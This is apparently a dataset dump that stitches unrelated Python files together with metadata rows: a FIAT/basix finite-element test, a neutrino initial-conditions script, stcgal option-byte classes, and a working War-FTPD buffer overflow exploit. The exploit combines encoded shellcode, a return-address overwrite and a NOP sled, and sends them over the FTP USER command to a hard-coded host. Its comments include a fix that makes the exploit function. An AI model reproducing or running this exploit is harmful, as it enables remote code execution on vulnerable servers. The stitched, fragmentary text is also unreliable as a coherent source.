                        assert (initial_network_count == final_network_count)
                    else:
                        if DEBUG_PRINTING:
                            print("less than 2 agents, nothing to do")
                    break
                if loopcount >= MAX_LOOPCOUNT:
                    print("Loopcount exit!!! loopcount:%s" % loopcount)
                assert loopcount < MAX_LOOPCOUNT
| 44.422794
| 113
| 0.578788
| 2,528
| 24,166
| 5.060522
| 0.065665
| 0.044712
| 0.048777
| 0.071289
| 0.873368
| 0.833346
| 0.80802
| 0.771516
| 0.755335
| 0.740405
| 0
| 0.008599
| 0.350368
| 24,166
| 543
| 114
| 44.504604
| 0.806293
| 0.015187
| 0
| 0.726457
| 0
| 0
| 0.10214
| 0.049788
| 0
| 0
| 0
| 0
| 0.038117
| 1
| 0.042601
| false
| 0
| 0.029148
| 0.002242
| 0.085202
| 0.103139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24c1611855efbd98b359b222c429ff1ffd837712
| 4,567
|
py
|
Python
|
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
import FIAT
import basix
import pytest
import numpy as np
"""
Some tests against FIAT. Some may fail due to issues in FIAT
(e.g. normalisation of orthonormal polynomial sets when n=0)
"""
@pytest.mark.parametrize("order", [1, 2, 3, 4])
def test_triangle(order):
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.Lagrange(cell, order)
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 3, True)
tab_fiat = L.tabulate(nderivs, pts)
L = basix.Lagrange(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("idx = ", basix.index(p - q, q))
print(tab_fiat[t])
print(tab_basix[basix.index(p - q, q)].transpose())
print()
assert(np.isclose(tab_fiat[t],
tab_basix[basix.index(p - q, q)].
transpose()).all())
@pytest.mark.parametrize("order", [1, 3])
def test_triangle_rt(order):
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 2, True)
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.RaviartThomas(cell, order, variant='integral')
tab_fiat = L.tabulate(nderivs, pts)
L = basix.RaviartThomas(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("idx = ", basix.index(p - q, q))
tab_fiat_cat = np.vstack((tab_fiat[t][:, 0, :],
tab_fiat[t][:, 1, :]))
# print(tab_fiat[t][:,0,:])
# print(tab_fiat[t][:,1,:])
print(tab_fiat_cat)
print(tab_basix[basix.index(p - q, q)].transpose())
print()
print(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].transpose()))
assert(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)]
.transpose()).all())
@pytest.mark.parametrize("order", [1, 2, 3])
def test_triangle_ned(order):
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 2, True)
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.Nedelec(cell, order, variant='integral')
tab_fiat = L.tabulate(nderivs, pts)
L = basix.Nedelec(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("basix.index = ", basix.index(p - q, q))
tab_fiat_cat = np.vstack((tab_fiat[t][:, 0, :],
tab_fiat[t][:, 1, :]))
# print(tab_fiat[t][:,0,:])
# print(tab_fiat[t][:,1,:])
print(tab_fiat_cat)
print(tab_basix[basix.index(p - q, q)].transpose())
print()
print(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].transpose()))
assert(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].
transpose()).all())
@pytest.mark.parametrize("order", [1, 2, 3, 4])
def test_tet(order):
nderivs = order
cell = FIAT.ufc_simplex(3)
L = FIAT.Lagrange(cell, order)
cell_type = basix.simplex_type(3)
pts = basix.create_lattice(cell_type, 7, True)
print(pts)
tab_fiat = L.tabulate(nderivs, pts)
L = basix.Lagrange(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
for r in range(q + 1):
t = (p - q, q - r, r)
print("basix.index = ", basix.index(*t))
print(tab_fiat[t])
print(tab_basix[basix.index(*t)].transpose())
print()
assert(np.isclose(tab_fiat[t],
tab_basix[basix.index(*t)]
.transpose()).all())
| 33.580882
| 75
| 0.543683
| 604
| 4,567
| 3.976821
| 0.13245
| 0.069942
| 0.018734
| 0.054954
| 0.866778
| 0.850125
| 0.833472
| 0.833472
| 0.813905
| 0.780183
| 0
| 0.018826
| 0.313773
| 4,567
| 135
| 76
| 33.82963
| 0.747607
| 0.029779
| 0
| 0.745283
| 0
| 0
| 0.017732
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 1
| 0.037736
| false
| 0
| 0.037736
| 0
| 0.075472
| 0.292453
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24e7c60d08b386aab07f3e5e5c77e69cb4dc1598
| 1,970
|
py
|
Python
|
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | 1
|
2020-04-16T12:00:44.000Z
|
2020-04-16T12:00:44.000Z
|
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | null | null | null |
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Exploit for War-FTPD (stack buffer overflow in the USER command).
# Layout: 485 filler bytes, a 4-byte saved-return overwrite
# (0x7cbd51fb little-endian -- presumably a JMP ESP gadget; confirm
# against the target DLL), a NOP sled padding the payload to 1100
# bytes, then the shellcode.
import socket

# Shellcode blob (msfvenom-style encoded payload).
buf = ""
buf += "\xbb\xa1\x56\xbc\xc8\xda\xd2\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x0e\x03\xfc\x58\x5e"
buf += "\x3d\x02\x8c\x1c\xbe\xfa\x4d\x41\x36\x1f\x7c\x41\x2c"
buf += "\x54\x2f\x71\x26\x38\xdc\xfa\x6a\xa8\x57\x8e\xa2\xdf"
buf += "\xd0\x25\x95\xee\xe1\x16\xe5\x71\x62\x65\x3a\x51\x5b"
buf += "\xa6\x4f\x90\x9c\xdb\xa2\xc0\x75\x97\x11\xf4\xf2\xed"
buf += "\xa9\x7f\x48\xe3\xa9\x9c\x19\x02\x9b\x33\x11\x5d\x3b"
buf += "\xb2\xf6\xd5\x72\xac\x1b\xd3\xcd\x47\xef\xaf\xcf\x81"
buf += "\x21\x4f\x63\xec\x8d\xa2\x7d\x29\x29\x5d\x08\x43\x49"
buf += "\xe0\x0b\x90\x33\x3e\x99\x02\x93\xb5\x39\xee\x25\x19"
buf += "\xdf\x65\x29\xd6\xab\x21\x2e\xe9\x78\x5a\x4a\x62\x7f"
buf += "\x8c\xda\x30\xa4\x08\x86\xe3\xc5\x09\x62\x45\xf9\x49"
buf += "\xcd\x3a\x5f\x02\xe0\x2f\xd2\x49\x6d\x83\xdf\x71\x6d"
buf += "\x8b\x68\x02\x5f\x14\xc3\x8c\xd3\xdd\xcd\x4b\x13\xf4"
buf += "\xaa\xc3\xea\xf7\xca\xca\x28\xa3\x9a\x64\x98\xcc\x70"
buf += "\x74\x25\x19\xd6\x24\x89\xf2\x97\x94\x69\xa3\x7f\xfe"
buf += "\x65\x9c\x60\x01\xac\xb5\x0b\xf8\x27\x7a\x63\x02\xb3"
buf += "\x12\x76\x02\xc2\x59\xff\xe4\xae\x8d\x56\xbf\x46\x37"
buf += "\xf3\x4b\xf6\xb8\x29\x36\x38\x32\xde\xc7\xf7\xb3\xab"
buf += "\xdb\x60\x34\xe6\x81\x27\x4b\xdc\xad\xa4\xde\xbb\x2d"
buf += "\xa2\xc2\x13\x7a\xe3\x35\x6a\xee\x19\x6f\xc4\x0c\xe0"
buf += "\xe9\x2f\x94\x3f\xca\xae\x15\xcd\x76\x95\x05\x0b\x76"
buf += "\x91\x71\xc3\x21\x4f\x2f\xa5\x9b\x21\x99\x7f\x77\xe8"
buf += "\x4d\xf9\xbb\x2b\x0b\x06\x96\xdd\xf3\xb7\x4f\x98\x0c"
buf += "\x77\x18\x2c\x75\x65\xb8\xd3\xac\x2d\xc8\x99\xec\x04"
buf += "\x41\x44\x65\x15\x0c\x77\x50\x5a\x29\xf4\x50\x23\xce"
buf += "\xe4\x11\x26\x8a\xa2\xca\x5a\x83\x46\xec\xc9\xa4\x42"

# BUG FIX: the original wrote the NOP sled as the literal string "x90"
# (three characters) instead of the NOP byte "\x90", which corrupted the
# sled length and contents and broke the exploit.
# Renamed from `buffer` to avoid shadowing the builtin.
payload = "A" * 485 + "\xfb\x51\xbd\x7c" + "\x90" * (1100 - 489 - len(buf)) + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109", 21))
r = s.recv(1024)
print(r)
s.send("USER " + payload + "\r\n")
r = s.recv(1024)
print(r)
| 41.914894
| 79
| 0.667005
| 431
| 1,970
| 3.044084
| 0.519722
| 0.004573
| 0.009146
| 0.015244
| 0.02439
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0.257065
| 0.06599
| 1,970
| 46
| 80
| 42.826087
| 0.455978
| 0.008122
| 0
| 0.108108
| 0
| 0.72973
| 0.7423
| 0.720739
| 0.027027
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.027027
| null | null | 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24f9a85c78f568eca2b01a93f139c948fe8f1d0c
| 2,048
|
py
|
Python
|
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
from Auxiliar_Functions import *
def initiate(nu_types, t_bins, E_i, E_f, E_step, E_0, Amplitude):
    """Build the initial state vector and grids for the flavor-evolution solver.

    Parameters
    ----------
    nu_types : list of str
        Flavor labels ("nu_e" or "nu_x"); they set the sign of the initial
        z-component for each flavor block.
    t_bins : int
        Number of steps in the returned time grid.
    E_i, E_f, E_step : float
        Energy grid start, stop and spacing (forwarded to np.arange).
    E_0, Amplitude : sequence
        Per-(flavor, nu/nubar) spectrum parameters, indexed as
        [n_f*j] for neutrinos and [n_f*j + 1] for antineutrinos.

    Returns
    -------
    tuple
        (y0, omega, E_vec, t_vec, mu_0, n_f, n_dim, n_E)
    """
    y0 = []          # initial state: (0, 0, +-spectrum) triples per bin
    omega = []       # vacuum oscillation frequencies, one per energy bin
    flavor_sign = 1
    E_vec = np.arange(E_i, E_f, E_step)
    n_E = len(E_vec)
    n_f = len(nu_types)
    n_dim = (n_f ** 2) - 1  # dimension of the SU(n_f) polarization vector
    for i in range(n_E):
        # delta_m2_31 / 2E; the 10**6 factor presumably converts the
        # energy grid from MeV to eV -- confirm against Auxiliar_Functions.
        omega.append(delta_m2_31 / (2 * E_vec[i] * 10 ** 6))  # eV
        for j in range(n_f):
            # "nu_e" -> +1, "nu_x" -> -1; any other label keeps the sign
            # from the previous iteration (original behavior, preserved).
            if nu_types[j] == "nu_x":
                flavor_sign = -1
            if nu_types[j] == "nu_e":
                flavor_sign = 1
            # nu
            nu_spec = Amplitude[n_f * j] * phi_vec(E_vec[i], E_0[n_f * j], 2.3) * E_step
            y0.append(0)
            y0.append(0)
            y0.append(flavor_sign * nu_spec)
            # nubar
            nu_spec = Amplitude[n_f * j + 1] * phi_vec(E_vec[i], E_0[n_f * j + 1], 2.3) * E_step
            y0.append(0)
            y0.append(0)
            y0.append(flavor_sign * nu_spec)
    # Self-interaction strength, tied to the largest vacuum frequency.
    mu_0 = 10 * max(omega)
    # Time grid: step is 1/5 of the period of the fastest frequency scale.
    # (An unused t_max local in the original was removed.)
    w_max = max(mu_0, max(omega))
    t_step = (2 * np.pi / w_max) / 5  # eV^-1
    t_vec = np.arange(0., t_bins * t_step, t_step)  # eV^-1
    return y0, omega, E_vec, t_vec, mu_0, n_f, n_dim, n_E
def initiate_v2(nu_types, t_bins, E_i, E_f, E_step, E_0, Amplitude):
    """Two-flavor variant of initiate(): z-component is the nu_e - nu_x
    spectral difference instead of a signed single-flavor spectrum.

    Same parameters and return tuple as initiate(); Amplitude/E_0 are
    indexed 0..3 as (nu_e, nubar_e, nu_x, nubar_x).
    """
    y0 = []          # initial state: (0, 0, Pz) triples per energy bin
    omega = []       # vacuum oscillation frequencies, one per energy bin
    E_vec = np.arange(E_i, E_f, E_step)
    n_E = len(E_vec)
    n_f = len(nu_types)
    n_dim = (n_f ** 2) - 1  # dimension of the SU(n_f) polarization vector
    for i in range(n_E):
        # delta_m2_31 / 2E; the 10**6 factor presumably converts the
        # energy grid from MeV to eV -- confirm against Auxiliar_Functions.
        omega.append(delta_m2_31 / (2 * E_vec[i] * 10 ** 6))  # eV
        # nu: Pz is the (unnormalized) nu_e - nu_x spectral difference
        nu_e_spec = Amplitude[0] * phi_vec(E_vec[i], E_0[0], 2.3) * E_step
        nu_x_spec = Amplitude[2] * phi_vec(E_vec[i], E_0[2], 2.3) * E_step
        Pz = (nu_e_spec - nu_x_spec)
        y0.append(0)
        y0.append(0)
        y0.append(Pz)
        # nubar
        nu_e_spec = Amplitude[1] * phi_vec(E_vec[i], E_0[1], 2.3) * E_step
        nu_x_spec = Amplitude[3] * phi_vec(E_vec[i], E_0[3], 2.3) * E_step
        Pz = (nu_e_spec - nu_x_spec)
        y0.append(0)
        y0.append(0)
        y0.append(Pz)
    # Self-interaction strength, tied to the largest vacuum frequency.
    mu_0 = 10 * max(omega)
    # Time grid: step is 1/5 of the period of the fastest frequency scale.
    # (Unused t_max and flavor_sign locals in the original were removed.)
    w_max = max(mu_0, max(omega))
    t_step = (2 * np.pi / w_max) / 5  # eV^-1
    t_vec = np.arange(0., t_bins * t_step, t_step)  # eV^-1
    return y0, omega, E_vec, t_vec, mu_0, n_f, n_dim, n_E
| 24.380952
| 73
| 0.650879
| 487
| 2,048
| 2.443532
| 0.12115
| 0.047059
| 0.033613
| 0.07395
| 0.882353
| 0.860504
| 0.830252
| 0.797479
| 0.746218
| 0.746218
| 0
| 0.060023
| 0.162109
| 2,048
| 83
| 74
| 24.674699
| 0.629953
| 0.091797
| 0
| 0.775862
| 0
| 0
| 0.004348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.017241
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
703f288c5501765c2ba8d727eecd70693bc74378
| 26,956
|
py
|
Python
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 469
|
2015-04-20T07:42:08.000Z
|
2022-03-28T07:07:10.000Z
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 69
|
2015-02-02T05:45:23.000Z
|
2022-03-06T01:26:20.000Z
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 110
|
2015-11-24T22:37:59.000Z
|
2022-03-26T18:33:21.000Z
|
#
# Copyright (c) 2013-2016 Grigori Goronzy <greg@chown.ath.cx>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import struct
from abc import ABC
from stcgal.utils import Utils
class BaseOption(ABC):
    """Base class for target option-byte manipulation.

    Subclasses fill ``self.options`` with (name, getter, setter) triples
    and ``self.msr`` with the model-specific register bytes.
    """

    def __init__(self):
        # (name, getter, setter) triples; populated by subclasses.
        self.options = ()
        # Model-specific register bytes; set by subclasses.
        self.msr = None

    def print(self):
        """Print current configuration to standard output"""
        print("Target options:")
        for name, get_func, _ in self.options:
            print(" %s=%s" % (name, get_func()))

    def set_option(self, name, value):
        """Set value of a specific option"""
        for opt, _, set_func in self.options:
            if opt == name:
                print("Option %s=%s" % (name, value))
                set_func(value)
                return
        raise ValueError("unknown")

    def get_option(self, name):
        """Get option value for a specific option"""
        for opt, get_func, _ in self.options:
            if opt == name:
                # BUG FIX: getters take no arguments (see print() above);
                # the original called get_func(name), which raised
                # TypeError on every successful lookup.
                return get_func()
        raise ValueError("unknown")

    def get_msr(self):
        """Get array of model-specific configuration registers"""
        return bytes(self.msr)
class Stc89Option(BaseOption):
    """Manipulation STC89 series option byte"""

    # msr bit layout (as implemented by the accessors below):
    #   bit 0: 6T CPU mode, active-low
    #   bit 2: BSL pin detect, active-low
    #   bit 3: EEPROM erase, active-low
    #   bit 4: clock gain (1 = high)
    #   bit 5: ALE enabled
    #   bit 6: XRAM enabled
    #   bit 7: watchdog on POR, active-low

    def __init__(self, msr):
        super().__init__()
        # Single option byte (plain int, unlike the bytearray subclasses).
        self.msr = msr
        # (name, getter, setter) triples consumed by BaseOption.
        self.options = (
            ("cpu_6t_enabled", self.get_t6, self.set_t6),
            ("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
            ("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
            ("clock_gain", self.get_clock_gain, self.set_clock_gain),
            ("ale_enabled", self.get_ale, self.set_ale),
            ("xram_enabled", self.get_xram, self.set_xram),
            ("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
        )

    def get_msr(self):
        # msr is a plain int here, so return it as-is (no bytes() wrap).
        return self.msr

    def get_t6(self):
        # Bit 0, active-low: cleared bit means 6T mode enabled.
        return not bool(self.msr & 1)

    def set_t6(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0xfe
        self.msr |= 0x01 if not bool(val) else 0x00

    def get_pindetect(self):
        # Bit 2, active-low.
        return not bool(self.msr & 4)

    def set_pindetect(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0xfb
        self.msr |= 0x04 if not bool(val) else 0x00

    def get_ee_erase(self):
        # Bit 3, active-low.
        return not bool(self.msr & 8)

    def set_ee_erase(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0xf7
        self.msr |= 0x08 if not bool(val) else 0x00

    def get_clock_gain(self):
        # Bit 4: 1 = "high", 0 = "low".
        gain = bool(self.msr & 16)
        return "high" if gain else "low"

    def set_clock_gain(self, val):
        gains = {"low": 0, "high": 0x10}
        if val not in gains.keys():
            raise ValueError("must be one of %s" % list(gains.keys()))
        self.msr &= 0xef
        self.msr |= gains[val]

    def get_ale(self):
        # Bit 5, active-high.
        return bool(self.msr & 32)

    def set_ale(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0xdf
        self.msr |= 0x20 if bool(val) else 0x00

    def get_xram(self):
        # Bit 6, active-high.
        return bool(self.msr & 64)

    def set_xram(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0xbf
        self.msr |= 0x40 if bool(val) else 0x00

    def get_watchdog(self):
        # Bit 7, active-low.
        return not bool(self.msr & 128)

    def set_watchdog(self, val):
        val = Utils.to_bool(val)
        self.msr &= 0x7f
        self.msr |= 0x80 if not bool(val) else 0x00
class Stc12AOption(BaseOption):
    """Manipulate STC12A series option bytes"""

    def __init__(self, msr):
        super().__init__()
        # STC12A uses exactly four option bytes.
        assert len(msr) == 4
        self.msr = bytearray(msr)
        """list of options and their handlers"""
        self.options = (
            ("low_voltage_reset", self.get_low_voltage_detect, self.set_low_voltage_detect),
            ("clock_source", self.get_clock_source, self.set_clock_source),
            ("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
            ("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
            ("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
            ("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
            ("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
        )

    def get_low_voltage_detect(self):
        # msr[3] bit 6: 0 = "high", 1 = "low".
        lvd = bool(self.msr[3] & 64)
        return "high" if not lvd else "low"

    def set_low_voltage_detect(self, val):
        lvds = {"low": 1, "high": 0}
        if val not in lvds.keys():
            raise ValueError("must be one of %s" % list(lvds.keys()))
        self.msr[3] &= 0xbf
        self.msr[3] |= lvds[val] << 6

    def get_clock_source(self):
        # msr[0] bit 1: 1 = external, 0 = internal.
        source = bool(self.msr[0] & 2)
        return "external" if source else "internal"

    def set_clock_source(self, val):
        sources = {"internal": 0, "external": 1}
        if val not in sources.keys():
            raise ValueError("must be one of %s" % list(sources.keys()))
        self.msr[0] &= 0xfd
        self.msr[0] |= sources[val] << 1

    def get_watchdog(self):
        # msr[1] bit 5, active-low.
        return not bool(self.msr[1] & 32)

    def set_watchdog(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0xdf
        self.msr[1] |= 0x20 if not val else 0x00

    def get_watchdog_idle(self):
        # msr[1] bit 3, active-low.
        return not bool(self.msr[1] & 8)

    def set_watchdog_idle(self, val):
        val = Utils.to_bool(val)
        self.msr[1] &= 0xf7
        self.msr[1] |= 0x08 if not val else 0x00

    def get_watchdog_prescale(self):
        # msr[1] bits 0-2 encode prescale as 2**(field + 1), i.e. 2..256.
        return 2 ** (((self.msr[1]) & 0x07) + 1)

    def set_watchdog_prescale(self, val):
        val = Utils.to_int(val)
        wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
        if val not in wd_vals.keys():
            raise ValueError("must be one of %s" % list(wd_vals.keys()))
        self.msr[1] &= 0xf8
        self.msr[1] |= wd_vals[val]

    def get_ee_erase(self):
        # msr[2] bit 1, active-low.
        return not bool(self.msr[2] & 2)

    def set_ee_erase(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xfd
        self.msr[2] |= 0x02 if not val else 0x00

    def get_pindetect(self):
        # msr[2] bit 0, active-low.
        return not bool(self.msr[2] & 1)

    def set_pindetect(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xfe
        self.msr[2] |= 0x01 if not val else 0x00
class Stc12Option(BaseOption):
    """Manipulate STC10/11/12 series option bytes"""

    def __init__(self, msr):
        super().__init__()
        # STC10/11/12 use exactly four option bytes.
        assert len(msr) == 4
        self.msr = bytearray(msr)
        """list of options and their handlers"""
        self.options = (
            ("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
            ("low_voltage_reset", self.get_low_voltage_detect, self.set_low_voltage_detect),
            ("oscillator_stable_delay", self.get_osc_stable_delay, self.set_osc_stable_delay),
            ("por_reset_delay", self.get_por_delay, self.set_por_delay),
            ("clock_gain", self.get_clock_gain, self.set_clock_gain),
            ("clock_source", self.get_clock_source, self.set_clock_source),
            ("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
            ("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
            ("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
            ("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
            ("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
        )

    def get_reset_pin_enabled(self):
        # msr[0] bit 0, active-high.
        return bool(self.msr[0] & 1)

    def set_reset_pin_enabled(self, val):
        val = Utils.to_bool(val)
        self.msr[0] &= 0xfe
        self.msr[0] |= 0x01 if bool(val) else 0x00

    def get_low_voltage_detect(self):
        # msr[0] bit 6, active-low.
        return not bool(self.msr[0] & 64)

    def set_low_voltage_detect(self, val):
        val = Utils.to_bool(val)
        self.msr[0] &= 0xbf
        self.msr[0] |= 0x40 if not val else 0x00

    def get_osc_stable_delay(self):
        # msr[0] bits 4-5 encode the delay as 2**(field + 12) clocks
        # (4096..32768).
        return 2 ** (((self.msr[0] >> 4) & 0x03) + 12)

    def set_osc_stable_delay(self, val):
        val = Utils.to_int(val)
        osc_vals = {4096: 0, 8192: 1, 16384: 2, 32768: 3}
        if val not in osc_vals.keys():
            raise ValueError("must be one of %s" % list(osc_vals.keys()))
        self.msr[0] &= 0xcf
        self.msr[0] |= osc_vals[val] << 4

    def get_por_delay(self):
        # msr[1] bit 7: 0 = "long", 1 = "short".
        delay = not bool(self.msr[1] & 128)
        return "long" if delay else "short"

    def set_por_delay(self, val):
        delays = {"short": 1, "long": 0}
        if val not in delays.keys():
            raise ValueError("must be one of %s" % list(delays.keys()))
        self.msr[1] &= 0x7f
        self.msr[1] |= delays[val] << 7

    def get_clock_gain(self):
        # msr[1] bit 6: 1 = "high", 0 = "low".
        gain = bool(self.msr[1] & 64)
        return "high" if gain else "low"

    def set_clock_gain(self, val):
        gains = {"low": 0, "high": 1}
        if val not in gains.keys():
            raise ValueError("must be one of %s" % list(gains.keys()))
        self.msr[1] &= 0xbf
        self.msr[1] |= gains[val] << 6

    def get_clock_source(self):
        # msr[1] bit 1: 1 = external, 0 = internal.
        source = bool(self.msr[1] & 2)
        return "external" if source else "internal"

    def set_clock_source(self, val):
        sources = {"internal": 0, "external": 1}
        if val not in sources.keys():
            raise ValueError("must be one of %s" % list(sources.keys()))
        self.msr[1] &= 0xfd
        self.msr[1] |= sources[val] << 1

    def get_watchdog(self):
        # msr[2] bit 5, active-low.
        return not bool(self.msr[2] & 32)

    def set_watchdog(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xdf
        self.msr[2] |= 0x20 if not val else 0x00

    def get_watchdog_idle(self):
        # msr[2] bit 3, active-low.
        return not bool(self.msr[2] & 8)

    def set_watchdog_idle(self, val):
        val = Utils.to_bool(val)
        self.msr[2] &= 0xf7
        self.msr[2] |= 0x08 if not val else 0x00

    def get_watchdog_prescale(self):
        # msr[2] bits 0-2 encode prescale as 2**(field + 1), i.e. 2..256.
        return 2 ** (((self.msr[2]) & 0x07) + 1)

    def set_watchdog_prescale(self, val):
        val = Utils.to_int(val)
        wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
        if val not in wd_vals.keys():
            raise ValueError("must be one of %s" % list(wd_vals.keys()))
        self.msr[2] &= 0xf8
        self.msr[2] |= wd_vals[val]

    def get_ee_erase(self):
        # msr[3] bit 1, active-low.
        return not bool(self.msr[3] & 2)

    def set_ee_erase(self, val):
        val = Utils.to_bool(val)
        self.msr[3] &= 0xfd
        self.msr[3] |= 0x02 if not val else 0x00

    def get_pindetect(self):
        # msr[3] bit 0, active-low.
        return not bool(self.msr[3] & 1)

    def set_pindetect(self, val):
        val = Utils.to_bool(val)
        self.msr[3] &= 0xfe
        self.msr[3] |= 0x01 if not val else 0x00
class Stc15AOption(BaseOption):
